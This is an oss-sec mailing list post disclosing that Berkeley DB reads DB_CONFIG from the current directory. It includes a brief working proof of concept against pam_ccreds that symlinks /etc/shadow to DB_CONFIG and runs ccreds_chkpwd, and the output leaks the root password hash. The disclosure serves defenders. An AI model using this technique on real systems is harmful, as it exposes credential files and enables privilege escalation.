oss-sec mailing list archives
Berkeley DB reads DB_CONFIG from cwd
From: Jakub Wilk <jwilk () jwilk net>
Date: Sun, 11 Jun 2017 00:06:13 +0200
Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented.
Here's how to exploit it against pam_ccreds: $ cat /etc/shadow cat: /etc/shadow: Permission denied $ ln -sf /etc/shadow DB_CONFIG $ /sbin/ccreds_chkpwd moo < /dev/null BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair (The above was tested on Debian jessie.) In the past, nss_db was also exploitable: CVE-2010-0826[*] More precisely, this seem to happen when you call db_create() with dbenv=NULL; or if you use the dbm_open() function.
-- Jakub Wilk
Current thread:
- Berkeley DB reads DB_CONFIG from cwd Jakub Wilk (Jun 10)
- Re: Berkeley DB reads DB_CONFIG from cwd Solar Designer (Jun 14)
- Re: Berkeley DB reads DB_CONFIG from cwd Solar Designer (Jun 15)
- Re: Berkeley DB reads DB_CONFIG from cwd Ritwik Ghoshal (Jun 15)